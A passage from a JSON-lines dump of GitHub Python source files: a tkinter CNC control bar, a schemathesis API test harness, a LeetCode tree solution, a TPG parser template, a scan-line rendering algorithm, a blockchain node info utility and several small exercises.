np.zeros(self.lin_dim)]\n )\n\n # Define bounds for the optimization\n bounds = [\n (0, 2 * np.pi) if i < self.bound_dim else (-np.inf, np.inf)\n for i in range(self.bound_dim + self.lin_dim)\n ]\n\n # Perform the optimization\n res = scipy.optimize.minimize(\n lambda x: -self.pdf(x), starting_point, bounds=bounds\n )\n\n # Check if the optimization might have stopped early\n if np.allclose(res.x, starting_point):\n print(\n \"Warning: Mode was at the starting point. This may indicate the optimizer stopped early.\"\n )\n\n return res.x\n\n @property\n def input_dim(self):\n return self.dim\n","repo_name":"FlorianPfaff/pyRecEst","sub_path":"pyrecest/distributions/cart_prod/abstract_hypercylindrical_distribution.py","file_name":"abstract_hypercylindrical_distribution.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17327574228","text":"import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport operator\nfrom core.cnc.cnc import Cnc\nfrom core.core import Core\nfrom core.observer import Observer\nfrom core.subject import Subject\nfrom gui.componentframe import ComponentFrame\n\nclass TopBarFrame(ComponentFrame,Observer):\n def __init__(self,parent,cnc = None) -> None:\n super().__init__(parent)\n self.cnc = cnc\n self.activ_connection = False\n\n self.img_on = ImageTk.PhotoImage(file= 'asset/on.png')\n self.img_off = ImageTk.PhotoImage(file= 'asset/off.png')\n self.img_alarm = ImageTk.PhotoImage(file= 'asset/alarm.png')\n\n self.list_port = []\n self.selected_port = tk.StringVar(self)\n \n\n self.list_design = {}\n self.archivos = {}\n self.selected_design = tk.StringVar(self)\n self.selected_design.set('Ninguno')\n\n self.upload_desings()\n self.define_widgets()\n \n self.config(width=1250,height=35)\n self.grid_propagate(0)\n\n\n def set_cnc(self, cnc: Cnc):\n self.cnc = cnc\n\n def set_core(self, core : Core):\n self.core = core\n\n def update(self, subject: Subject) -> None:\n self.list_port = [subject.port]\n self.cbx_port.config(values = self.list_port)\n self.selected_port.set(self.list_port[0])\n\n if subject.alarm :\n self.btn_alarm.config(image = self.img_alarm)\n self.btn_alarm.image = self.img_alarm\n\n def upload_desings(self):\n \n dir_desings = \"designs/\"\n content = os.listdir(dir_desings)\n for f in content:\n ficheros = os.listdir(dir_desings+f+\"/\")\n for a in ficheros:\n if \".py\" in a:\n n = a.split(\".\")[0].replace(\"_\",\" \")\n self.archivos[n] = dir_desings + f + \"/\" + a\n self.list_design = list(self.archivos.keys())\n\n\n def define_widgets(self):\n self.wrap1 = tk.Frame(self,width=600,height=30)\n self.wrap1.grid_propagate(0)\n\n self.lbl_port = tk.Label(self.wrap1, text='Port:')\n self.cbx_port = ttk.Combobox(self.wrap1,values=self.list_port,textvariable=self.selected_port)\n\n self.btn_conect = tk.Button(self.wrap1,text='Conectar',command=self.connect,image=self.img_off,width=80,compound = tk.LEFT)\n self.btn_alarm = tk.Button(self.wrap1,text=' Unlock',command=self.disabled_lock,image=self.img_off,width=80,compound = tk.LEFT)\n self.btn_alarm.image = self.img_off\n self.lbl_design = tk.Label(self, text='Diseño:')\n self.cbx_design = ttk.Combobox(self,values=self.list_design,textvariable=self.selected_design)\n self.cbx_design.bind('<>', self.select)\n self.lbl_port.grid(row=0,column=0,pady=2)\n self.cbx_port.grid(row=0,column=1,pady=2)\n self.wrap1.grid(row=0,column=0,sticky=tk.E,pady=5,padx=5)\n self.btn_conect.grid(row=0,column=2,pady=2,padx=5)\n self.btn_alarm.grid(row=0,column=3)\n\n self.lbl_design.grid(row=0,column=1,padx=5,pady=5)\n self.cbx_design.grid(row=0,column=2,pady=5,padx=5)\n\n \n def select(self,e):\n self.core.file = self.archivos[self.selected_design.get()]\n\n\n def disabled_lock(self):\n self.cnc.disable_alarm()\n self.btn_alarm.config(image = self.img_off)\n self.btn_alarm.image = self.img_off\n \n def connect(self):\n self.activ_connection = operator.not_(self.activ_connection)\n \n if self.activ_connection :\n self.cnc.connect_serial()\n self.btn_conect.config(image = self.img_on)\n self.btn_conect.image = self.img_on\n else:\n self.btn_conect.config(image = self.img_off)\n self.btn_conect.image = self.img_off\n","repo_name":"crcampos5/CookieMachine","sub_path":"gui/topbarframe.py","file_name":"topbarframe.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22531064565","text":"from hypothesis import settings, Phase\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nimport urllib.request\nimport schemathesis\nimport os\nimport logging\n\nDEFAULT_TIMEOUT = 1\nenvironment = 'goatfield' #os.environ.get('ENVIRONMENT_ARG')\nbase_url = 'https://api-vs.goatfield.us' #os.environ.get('BASE_URL_ARG')\nretry_attempts = int(os.environ.get('RETRY_ATTEMPTS', 60))\nretry_timeout = int(os.environ.get('RETRY_TIMEOUT', 2))\n\nif os.path.exists('apikeys.json'):\n with open('apikeys.json') as json_file:\n keysdict = json.load(json_file)\nelse:\n keysdict = json.loads(os.environ.get('VS_API_KEY'))\n\n# Most of the time, if this is being ran it is after a new environment is created, \n# and there may be a window when services are being cycled. So we wait for 200s.\nfor i in range(retry_attempts):\n health_url = \"{}/_health/\".format(base_url)\n try:\n r = requests.get(health_url)\n if r.status_code == 200:\n break\n except Exception as err:\n print(\"Attempt {0}/{1} error: {2}\".format(i + 1, retry_attempts, err))\n if i is not retry_attempts - 1:\n sleep(retry_timeout)\n\n# This is required because of this:\n# https://github.com/flasgger/flasgger/issues/267\njsonurl = urllib.request.urlopen(\"{}/v1/spec.json\".format(base_url))\nschema_dict = json.loads(jsonurl.read())\nschema_dict.pop('definitions', None)\nschema = schemathesis.from_dict(\n schema_dict, \n base_url=base_url, \n skip_deprecated_operations=True,\n)\n\n# Get our access token by exchanging our keys for it.\ndef bearer_access_token():\n query = {\n \"grant_type\": \"refresh_token\",\n \"client_id\": keysdict['ClientId'],\n \"refresh_token\": keysdict['refresh_token'],\n \"scope\": \"CognitoGroup/Developers\",\n }\n r = requests.post(\n \"https://oauth.{}.us/oauth2/token\".format(environment),\n data=query,\n auth=HTTPBasicAuth(keysdict['ClientId'], keysdict['ClientSecret']),\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n )\n response = r.json()\n try:\n response['access_token']\n except KeyError:\n logging.error(\"There was a problem authenticating to VoteShield, please check your API Key and Parameters.\")\n return response['access_token']\n\nlogging.info(bearer_access_token())\n\n# For now, population and tag routes are excluded.\n@schema.parametrize(method=\"GET\",endpoint=\"^/(?!download_population)\")\n@settings(phases=[Phase.explicit], deadline=None)\ndef test_api(case):\n # Slow routes are defined here. Don't really know of a way to not hard code these.\n timeout = {\n (\"GET\", \"/changes\"): 120,\n (\"GET\", \"/change_history\"): 60,\n (\"GET\", \"/compare\"): 60,\n (\"GET\", \"/download_population\"): 120,\n (\"GET\", \"/notable_populations\"): 60,\n (\"GET\", \"/system/snapshots\"): 60\n }.get((case.operation.method.upper(), case.operation.path), DEFAULT_TIMEOUT)\n case.headers = case.headers or {}\n case.headers[\"Authorization\"] = \"Bearer \" + f\"{bearer_access_token()}\"\n case.call_and_validate(timeout=timeout)","repo_name":"Voteshield/VapeShield","sub_path":"src/vape.py","file_name":"vape.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1609995757","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def flatten(self, root: Optional[TreeNode]) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n if not root:\n return root\n \n queue = collections.deque([])\n \n self.dfs(root, queue)\n \n # cur begins from head\n cur = queue.popleft()\n cur.left = None\n \n # 遍历链表,将链表中的TreeNode节点前后串联起来\n while queue:\n nextnode = queue.popleft()\n nextnode.left = None\n cur.right = nextnode\n cur = nextnode\n \n return root\n \n def dfs(self, root, queue):\n # 前序遍历整棵二叉树,并将遍历的结果放到数组中\n if not root:\n return root\n queue.append(root)\n self.dfs(root.left, queue)\n self.dfs(root.right, queue)\n \n# https://leetcode-cn.com/problems/flatten-binary-tree-to-linked-list/solution/dong-hua-yan-shi-si-chong-jie-fa-114-er-cha-shu-zh/\n","repo_name":"cindyyj/leetcode_solutions","sub_path":"114-flatten-binary-tree-to-linked-list/114-flatten-binary-tree-to-linked-list.py","file_name":"114-flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27899632142","text":"from channels.generic.websocket import WebsocketConsumer\nfrom channels.exceptions import StopConsumer\nimport json\nfrom django.db.models import Q\nfrom asgiref.sync import async_to_sync\nfrom business import models\n\n\nclass SpectacularsConsumers(WebsocketConsumer):\n def websocket_connect(self, message):\n \"\"\"服务端接收连接\"\"\"\n group_id = self.scope['url_route']['kwargs'].get('group_id')\n self.accept()\n async_to_sync(self.channel_layer.group_add)(group_id, self.channel_name)\n\n def websocket_receive(self, message):\n \"\"\"客户端浏览器向服务端发送消息,此方法触发\"\"\"\n veh_obj_dict = {}\n group_id = self.scope['url_route']['kwargs'].get('group_id')\n # 获取快修班组车辆数据\n quick_service_veh_obj = models.QuickServiceVehicle.objects.exclude(\n Q(quick_service_status='完工交车') | Q(quick_service_status='暂停等件') | Q(quick_service_status='车辆终检'))\n service_veh_obj = models.ServiceVehicle.objects.exclude(\n Q(service_status='完工交车') | Q(service_status='暂停等件') | Q(service_status='车辆终检'))\n vehicle_road_test_obj = models.VehicleRoadTest.objects.exclude(service_status='结束路试')\n fqc_vehicle_obj = models.FQC.objects.exclude(service_status='完工交车')\n\n quick_1_list = []\n quick_2_list = []\n quick_1_status_list = []\n quick_2_status_list = []\n for veh_obj in quick_service_veh_obj:\n if veh_obj.quick_service_team == \"快修一组\":\n quick_1_list.append(veh_obj.vehicle_num)\n quick_1_status_list.append(veh_obj.quick_service_status)\n elif veh_obj.quick_service_team == \"快修二组\":\n quick_2_list.append(veh_obj.vehicle_num)\n quick_2_status_list.append(veh_obj.quick_service_status)\n quick_lis_1 = dict(zip(quick_1_list, quick_1_status_list))\n quick_lis_2 = dict(zip(quick_2_list, quick_2_status_list))\n veh_obj_dict['快修一组'] = quick_lis_1\n veh_obj_dict['快修二组'] = quick_lis_2\n service_1_list = []\n service_2_list = []\n service_3_list = []\n service_4_list = []\n service_5_list = []\n service_6_list = []\n service_1_status_list = []\n service_2_status_list = []\n service_3_status_list = []\n service_4_status_list = []\n service_5_status_list = []\n service_6_status_list = []\n for service_obj in service_veh_obj:\n if service_obj.service_team == \"机电一组\":\n service_1_list.append(service_obj.vehicle_num)\n service_1_status_list.append(service_obj.service_status)\n\n if service_obj.service_team == \"机电二组\":\n service_2_list.append(service_obj.vehicle_num)\n service_2_status_list.append(service_obj.service_status)\n\n if service_obj.service_team == \"机电三组\":\n service_3_list.append(service_obj.vehicle_num)\n service_3_status_list.append(service_obj.service_status)\n\n if service_obj.service_team == \"机电四组\":\n service_4_list.append(service_obj.vehicle_num)\n service_4_status_list.append(service_obj.service_status)\n\n if service_obj.service_team == \"机电五组\":\n service_5_list.append(service_obj.vehicle_num)\n service_5_status_list.append(service_obj.service_status)\n\n if service_obj.service_team == \"机电六组\":\n service_6_list.append(service_obj.vehicle_num)\n service_6_status_list.append(service_obj.service_status)\n\n service_1_veh_list = dict(zip(service_1_list, service_1_status_list))\n service_2_veh_list = dict(zip(service_2_list, service_2_status_list))\n service_3_veh_list = dict(zip(service_3_list, service_3_status_list))\n service_4_veh_list = dict(zip(service_4_list, service_4_status_list))\n service_5_veh_list = dict(zip(service_5_list, service_5_status_list))\n service_6_veh_list = dict(zip(service_6_list, service_6_status_list))\n\n veh_obj_dict['机电一组'] = service_1_veh_list\n veh_obj_dict['机电二组'] = service_2_veh_list\n veh_obj_dict['机电三组'] = service_3_veh_list\n veh_obj_dict['机电四组'] = service_4_veh_list\n veh_obj_dict['机电五组'] = service_5_veh_list\n veh_obj_dict['机电六组'] = service_6_veh_list\n\n road_obj_list = []\n road_status_list = []\n for road_test_obj in vehicle_road_test_obj:\n road_obj_list.append(road_test_obj.vehicle_num)\n road_status_list.append(road_test_obj.service_status)\n road_test_status_list = dict(zip(road_obj_list, road_status_list))\n veh_obj_dict['车辆路试'] = road_test_status_list\n\n fqc_vehicle_obj_list = []\n fqc_vehicle_obj_status_list = []\n for fqc_obj in fqc_vehicle_obj:\n fqc_vehicle_obj_list.append(fqc_obj.vehicle_num)\n fqc_vehicle_obj_status_list.append(fqc_obj.service_status)\n fqc_obj_list = dict(zip(fqc_vehicle_obj_list, fqc_vehicle_obj_status_list))\n veh_obj_dict['车辆终检'] = fqc_obj_list\n\n async_to_sync(self.channel_layer.group_send)(group_id, {'type': 'my.send',\n 'message': {'code': 'init', 'data': veh_obj_dict}})\n\n def my_send(self, event):\n message = event['message']\n self.send(json.dumps(message))\n\n def websocket_disconnect(self, message):\n \"\"\"客户端主动断开连接,服务端抛出一个停止连接的异常\"\"\"\n group_id = self.scope['url_route']['kwargs'].get('group_id')\n async_to_sync(self.channel_layer.group_discard)(group_id, self.channel_name)\n raise StopConsumer()\n","repo_name":"sunbo449/wms","sub_path":"wms/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21047069652","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 20 13:44:12 2022\n\n@author: Mugdho\n\"\"\"\n\nn=int(input())\nr = input().split()\nlst=list(map(int,r))\narr = sorted(lst)\nx = len(arr)\nmx = max(arr)\ny = -7\nfor i in range (0,x):\n if arr[i] expression/a\n ;\n expression/a -> muldiv/a\n ;\n muldiv/a -> parens/a\n ( \"\\*\" parens/b $ a = Multiply(a, b) $\n | \"/\" parens/b $ a = Divide(a, b) $\n )* ;\n parens/a -> \"\\(\" expression/a \"\\)\" | literal/a\n ;\n literal/a -> int/a;\n \"\"\"\n\n# Make an instance of the parser. This acts like a function.\nparse = Parser()\n\n# This is the driver code, that reads in lines, deals with errors, and\n# prints the output if no error occurs.\n\n# Open the file containing the input.\ntry:\n f = open(sys.argv[1], \"r\")\nexcept(IndexError, IOError):\n f = open(\"input1.txt\", \"r\")\n\n# For each line in f\nfor l in f:\n try:\n # Try to parse the expression.\n node = parse(l)\n\n # Try to get a result.\n result = node.evaluate()\n\n # Print the representation of the result.\n print(repr(result))\n\n # If an exception is thrown, print the appropriate error.\n except tpg.Error:\n print(\"SYNTAX ERROR\")\n # Uncomment the next line to re-raise the syntax error,\n # displaying where it occurs. Comment it for submission.\n # raise\n\n except SemanticError:\n print(\"SEMANTIC ERROR\")\n # Uncomment the next line to re-raise the semantic error,\n # displaying where it occurs. Comment it for submission.\n # raise\n\nf.close()","repo_name":"elvis-alexander/StonyBrookCS","sub_path":"cse307/cse307/tpg/template_tpg.py","file_name":"template_tpg.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10615825233","text":"def final_result(current_dict):\n result = []\n for key, values in sorted(current_dict.items()):\n result.append(values)\n return result\n\n\nto_do_dict = {}\n\ncommand = input()\n\nwhile command != \"End\":\n importance, note = command.split(\"-\")\n to_do_dict[int(importance)] = note\n\n command = input()\n\nprint(final_result(to_do_dict))","repo_name":"AlexanderBedrosyan/Programming-Fundamentals-with-Python","sub_path":"Lists Advanced - Lab/to_do_list_2.py","file_name":"to_do_list_2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25287050263","text":"import random\r\n\r\nfrom ants_algorithm.model.AntEnvironment import AntEnvironment\r\nfrom ants_algorithm.model.AntPathSolution import AntPathSolution\r\nfrom evolution.greedy.model.Chromosome import Chromosome\r\n\r\n\r\nclass EventProcessing:\r\n\r\n @staticmethod\r\n def process_event(environment: AntEnvironment, paths_for_demand, chromosome: Chromosome):\r\n keys = list(environment.demands.demands_map_id.keys())\r\n key_index = random.randint(0, len(keys) - 1)\r\n key = keys[key_index]\r\n old_value = environment.demands.demands_map_id[key].value\r\n new_value = old_value * 2\r\n environment.demands.demands_map_id[key].value = new_value\r\n print('Event changed demand', key, 'value from', old_value, 'to', new_value)\r\n\r\n demand_paths = paths_for_demand[key]\r\n if chromosome.path_first_or_second_map[key] == 0:\r\n for link in demand_paths.first_path.path:\r\n chromosome.links_usage_map[link.link_id] = chromosome.links_usage_map[link.link_id] - old_value\r\n else:\r\n for link in demand_paths.second_path.path:\r\n chromosome.links_usage_map[link.link_id] = chromosome.links_usage_map[link.link_id] - old_value\r\n\r\n first_path_cost = EventProcessing.__calculate_path_cost(demand_paths.first_path, chromosome, new_value)\r\n second_path_cost = EventProcessing.__calculate_path_cost(demand_paths.second_path, chromosome, new_value)\r\n if first_path_cost <= second_path_cost:\r\n chromosome.path_first_or_second_map[key] = 0\r\n for link in demand_paths.first_path.path:\r\n EventProcessing.update_links_values(chromosome, environment, link, new_value)\r\n else:\r\n chromosome.path_first_or_second_map[key] = 1\r\n for link in demand_paths.second_path.path:\r\n EventProcessing.update_links_values(chromosome, environment, link, new_value)\r\n\r\n @staticmethod\r\n def update_links_values(chromosome, environment, link, new_value):\r\n new_demand_value = chromosome.links_usage_map[link.link_id] + new_value\r\n chromosome.links_usage_map[link.link_id] = new_demand_value\r\n if new_demand_value > link.capacity:\r\n overflow = new_demand_value - link.capacity\r\n chosen_extensions = 0\r\n while overflow > 0:\r\n max_extension = environment.capacity_extensions[len(environment.capacity_extensions) - 1]\r\n if overflow > max_extension:\r\n chosen_extensions = chosen_extensions + max_extension\r\n overflow = overflow - max_extension\r\n else:\r\n for extension in environment.capacity_extensions:\r\n if extension >= overflow:\r\n chosen_extensions = chosen_extensions + extension\r\n overflow = overflow - extension\r\n break\r\n if link.link_id in environment.capacities_extended:\r\n environment.capacities_extended[link.link_id] = environment.capacities_extended[link.link_id] + chosen_extensions\r\n else:\r\n environment.capacities_extended[link.link_id] = chosen_extensions\r\n\r\n @staticmethod\r\n def __calculate_path_cost(solution: AntPathSolution, chromosome: Chromosome, new_value):\r\n cost = 0\r\n for link in solution.path:\r\n new_value_on_link = chromosome.links_usage_map[link.link_id] + new_value\r\n cost = cost + link.cost + max(new_value_on_link - link.capacity, 0) * 10\r\n return cost\r\n","repo_name":"assist-iot/auto_configurable_network","sub_path":"software/onos-opa-example-with-delay/evolution/greedy/evaluation/EventProcessing.py","file_name":"EventProcessing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45285984314","text":"from edge import *\nfrom point import *\n\nclass ScanLineAlgoritm():\n\n @classmethod\n def __get_active_polygons(cls, polygons):\n \"Remove from polygons sequence items without 2D representation.\"\n return [p for p in polygons if all([e.is_representation2D() for e in p.edges])]\n\n @classmethod\n def __get_edges_y_range(cls, polygons):\n \"Calculate minimum and maximum of sequence of edges on axis y.\"\n r_min = min([e.edge2D.get_axis_param('y', min) for p in polygons for e in p.edges])\n r_max = max([e.edge2D.get_axis_param('y', max) for p in polygons for e in p.edges])\n\n return (int(r_min), int(r_max))\n\n @classmethod\n def __get_y_const2D_edges_dict(cls, polygons, y_range, throwing_area):\n \"Get dictionary of edges with edge2D type Y_CONST.\"\n\n def get_cross_with_y_axis_2D(polygon, y):\n cross2D = [(e, e.edge2D.cross_with_axis('y', y)) for e in polygon.edges]\n cross2D = list(filter(lambda c: c[1], cross2D))\n \n return cross2D\n\n def get_cross3D(cross2D):\n cross3D = []\n for c in cross2D:\n if(type(c[1]) == tuple):\n cross3D.extend((c[0].edge3D.s_point, c[0].edge3D.e_point))\n else:\n t = c[0].edge3D.get_transformation_ratio(c[1], throwing_area)\n cross3D.append(c[0].edge3D.get_point(t))\n cross3D.sort(key=lambda c: c.x)\n\n return cross3D\n\n def get_y_const2D_edges(polygon, y):\n edges = []\n cross2D = get_cross_with_y_axis_2D(polygon, y)\n cross3D = get_cross3D(cross2D)\n for i in range(0, len(cross3D)-1, 2):\n try:\n edge = Edge((cross3D[i], cross3D[i+1]), throwing_area, polygon.color)\n edges.append(edge)\n except (PointException, EdgeException):\n pass\n\n return edges\n\n edges_dict = {}\n for y in range(y_range[0], y_range[1]+1):\n for p in polygons:\n edges = get_y_const2D_edges(p ,y)\n edges_dict.setdefault(y, []).extend(edges)\n \n return edges_dict\n\n @classmethod\n def __get_y_const2D_subedges_dict(cls, edges_dict, throwing_area):\n \n def subcross_with_edge3D_init(edges):\n subcross3D = [[e, e.edge3D.s_point, e.edge3D.e_point] for e in edges]\n for i in range(0, len(edges)-1):\n for j in range(i+1, len(edges)):\n cross2D = edges[i].edge2D.cross_with_edge(edges[j].edge2D)\n if(cross2D):\n if(type(cross2D) == tuple):\n for p in cross2D:\n t1 = edges[i].edge3D.get_transformation_ratio(p, throwing_area)\n p1 = edges[i].edge3D.get_point(t1)\n if(p1 and p1 not in subcross3D[i]): subcross3D[i].append(p1)\n \n t2 = edges[j].edge3D.get_transformation_ratio(p, throwing_area)\n p2 = edges[j].edge3D.get_point(t2)\n if(p2 and p2 not in subcross3D[j]): subcross3D[j].append(p2)\n else:\n t1 = edges[i].edge3D.get_transformation_ratio(cross2D, throwing_area)\n p1 = edges[i].edge3D.get_point(t1)\n if(p1 and p1 not in subcross3D[i]): subcross3D[i].append(p1)\n \n t2 = edges[j].edge3D.get_transformation_ratio(cross2D, throwing_area)\n p2 = edges[j].edge3D.get_point(t2)\n if(p2 and p2 not in subcross3D[j]): subcross3D[j].append(p2)\n return subcross3D\n\n # return [[e, e.edge3D.s_point, e.edge3D.e_point] for e in edges]\n\n def get_subcross_with_edge3D(edges):\n subcross3D = subcross_with_edge3D_init(edges)\n for i in range(0, len(edges)-1):\n for j in range(i+1, len(edges)):\n cross3D = edges[i].edge3D.cross_with_edge(edges[j].edge3D)\n if(cross3D):\n if(type(cross3D) == tuple):\n list(map(lambda c: subcross3D[i].append(c), [c for c in cross3D if c not in subcross3D[i]]))\n list(map(lambda c: subcross3D[j].append(c), [c for c in cross3D if c not in subcross3D[j]]))\n else:\n if(cross3D not in subcross3D[i]): subcross3D[i].append(cross3D)\n if(cross3D not in subcross3D[j]): subcross3D[j].append(cross3D)\n\n for i, sc in enumerate(subcross3D[:]):\n subcross3D[i][1:] = sorted(sc[1:], key = lambda p3D: p3D.x)\n \n return subcross3D\n\n def get_y_const2D_subedges(subcross3D):\n subedges = []\n for sc in subcross3D:\n for i in range(1, len(sc)-1):\n try:\n points3D = (sc[i], sc[i+1])\n subedges.append(Edge(points3D, throwing_area, sc[0].color))\n except (PointException, EdgeException):\n pass\n\n subedges.sort(key=lambda se: se.edge3D.get_axis_param('z', min), reverse=True)\n\n return [se.edge2D for se in subedges]\n\n subedges_dict = {}\n for y, edges in edges_dict.items():\n if(y == 80):\n print(\"Wow\")\n subcross3D = get_subcross_with_edge3D(edges)\n subedges = get_y_const2D_subedges(subcross3D)\n subedges_dict[y] = subedges\n \n return subedges_dict\n\n @classmethod\n def scan(cls, polygons, throwing_area):\n active_polygons = cls.__get_active_polygons(polygons)\n if(active_polygons):\n y_range = cls.__get_edges_y_range(active_polygons)\n y_const2D_edges_dict = cls.__get_y_const2D_edges_dict(active_polygons, y_range, throwing_area)\n y_const2D_subedges_dict = cls.__get_y_const2D_subedges_dict(y_const2D_edges_dict, throwing_area)\n return y_const2D_subedges_dict\n else:\n return []","repo_name":"msparrowskyIT/vcamera","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19766056680","text":"import argparse\nimport binascii\nimport json\nimport pprint\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nfrom bbc1.core import bbc_app\nfrom bbc1.core.bbc_config import DEFAULT_CORE_PORT\nfrom bbc1.core import bbclib\nfrom bbc1.core.message_key_types import KeyType\n\n\ndef wait_check_result_msg_type(callback, msg_type):\n dat = callback.synchronize()\n if dat[KeyType.command] != msg_type:\n sys.stderr.write(\"XXXXXX not expected result: %d <=> %d(received)\\n\" % (msg_type, dat[KeyType.command]))\n return dat\n\n\ndef get_neighborlist(client):\n client.get_domain_list()\n domainlist = client.callback.synchronize()\n for domain_id in domainlist:\n client.get_domain_neighborlist(domain_id=domain_id)\n dat = bbcclient.callback.synchronize()\n print(\"====== neighbor list of domain:%s =====\" % binascii.b2a_hex(domain_id).decode())\n print(\" node_id(4byte), ipv4, ipv6, port, is_domain0\")\n for k in range(len(dat)):\n node_id, ipv4, ipv6, port, domain0 = dat[k]\n if k == 0:\n print(\"*myself* %s, %s, %s, %d, %s\" % (binascii.b2a_hex(node_id[:4]), ipv4, ipv6, port, domain0))\n else:\n print(\" %s, %s, %s, %d, %s\" % (binascii.b2a_hex(node_id[:4]), ipv4, ipv6, port, domain0))\n\n\ndef argument_parser():\n argparser = argparse.ArgumentParser(description='Configure bbc_core using json conf file.')\n argparser.add_argument('-4', '--ip4address', action='store', default=\"127.0.0.1\", help='bbc_core address (IPv4)')\n argparser.add_argument('-6', '--ip6address', action='store', help='bbc_core address (IPv6)')\n argparser.add_argument('-p', '--port', action='store', default=DEFAULT_CORE_PORT, help='port number of bbc_core')\n argparser.add_argument('-d', '--domain_id', action='store', default=None, help='domain_id HEX string')\n argparser.add_argument('-l', '--neighborlist', action='store_true', default=False,\n help='Get neighbor_list in bbc_core')\n argparser.add_argument('-u', '--userlist', action='store_true', default=False, help='Get user_ist in bbc_core')\n argparser.add_argument('-n', '--my_node_id', action='store_true', default=False, help='Get my node_id')\n argparser.add_argument('--stat', action='store_true', default=False, help='Get statistics of the bbc_core')\n argparser.add_argument('--getconfig', action='store_true', default=False, help='Get config from bbc_core')\n argparser.add_argument('-k', '--node_key', action='store', default=\".bbc1/node_key.pem\",\n help=\"path to node key pem file\")\n return argparser.parse_args()\n\n\nif __name__ == '__main__':\n parsed_args = argument_parser()\n addr = None\n port = None\n\n if parsed_args.ip4address:\n addr = parsed_args.ip4address\n if parsed_args.ip6address:\n addr = parsed_args.ip6address\n port = parsed_args.port\n\n bbcclient = bbc_app.BBcAppClient(host=addr, port=port, multiq=False, loglevel=\"all\")\n if os.path.exists(parsed_args.node_key):\n bbcclient.set_node_key(parsed_args.node_key)\n\n if parsed_args.getconfig:\n bbcclient.get_bbc_config()\n dat = wait_check_result_msg_type(bbcclient.callback, bbclib.MsgType.RESPONSE_GET_CONFIG)\n print(\"------ config.json ------\")\n conf = json.loads(dat[KeyType.bbc_configuration].decode())\n pprint.pprint(conf, width=80)\n sys.exit(0)\n\n if parsed_args.stat or (not parsed_args.my_node_id and not parsed_args.userlist and not parsed_args.neighborlist):\n bbcclient.get_stats()\n dat = wait_check_result_msg_type(bbcclient.callback, bbclib.MsgType.RESPONSE_GET_STATS)\n print(\"------ statistics ------\")\n pprint.pprint(dat[KeyType.stats], width=80)\n sys.exit(0)\n\n if parsed_args.domain_id is None:\n sys.stderr.write(\"-d option (domain_id) is mandatory\\n\")\n sys.exit(1)\n domain_id = bbclib.convert_idstring_to_bytes(parsed_args.domain_id)\n bbcclient.set_domain_id(domain_id)\n\n if parsed_args.my_node_id:\n bbcclient.get_node_id()\n node_id = bbcclient.callback.synchronize()\n print(\"Node_id is %s\" % node_id.hex())\n elif parsed_args.userlist:\n bbcclient.get_user_list()\n user_list = bbcclient.callback.synchronize()\n print(\"------- user_list -------\")\n for uid in user_list:\n print(\"User_id: \", uid.hex())\n elif parsed_args.neighborlist:\n get_neighborlist(bbcclient)\n\n sys.exit(0)\n","repo_name":"beyond-blockchain/bbc1","sub_path":"utils/bbc_info.py","file_name":"bbc_info.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} +{"seq_id":"26355561387","text":"from django.contrib import admin\n\n# Register your models here.\nfrom userprofile.models import Profile\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"username\",\n \"email\",\n \"tel_number\",\n \"gender\",\n \"type\",\n \"balance\",\n \"nickname\",\n \"status\",\n \"version\",\n \"create_time\",\n \"modify_time\",\n )\n\n\nadmin.site.register(Profile, ProfileAdmin)\n","repo_name":"xuping2012/SpareFoodShare","sub_path":"userprofile/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22674358108","text":"\"\"\"\nGregor Wagner\nU4Bsp3.py - \nGregor Wagner, 52005240\n\"\"\"\nimport json\n\nclass Person() :\n def __init__(self, v_name, l_name, city, post_code) :\n self.vname = v_name.capitalize()\n self.nname = l_name.capitalize()\n self.city = city.capitalize()\n self.post_code = post_code\n\n def __str__(self) :\n return f\"{self.vname} {self.nname}, {self.post_code} {self.city}\"\n\n\ndef getJsonFromFile(file) :\n try:\n f = open(file, mode=\"r\", encoding='utf-8')\n data = f.read()\n f.close()\n except FileNotFoundError:\n print(\"Du bist vermutlich im Falschen Verzeichnis\")\n exit()\n \n\n return data\n\ndef checkPeople(people) :\n \n for p1 in people :\n if p1.vname == \"\" or p1.nname == \"\" or p1.city == \"\" or p1.post_code == \"\":\n print(f'EMPTY ATTRIBUTES {p1}')\n people.remove(p1)\n p_gleich = 0\n if p1.vname == \"Holly\" :\n pass\n for p2 in people :\n if 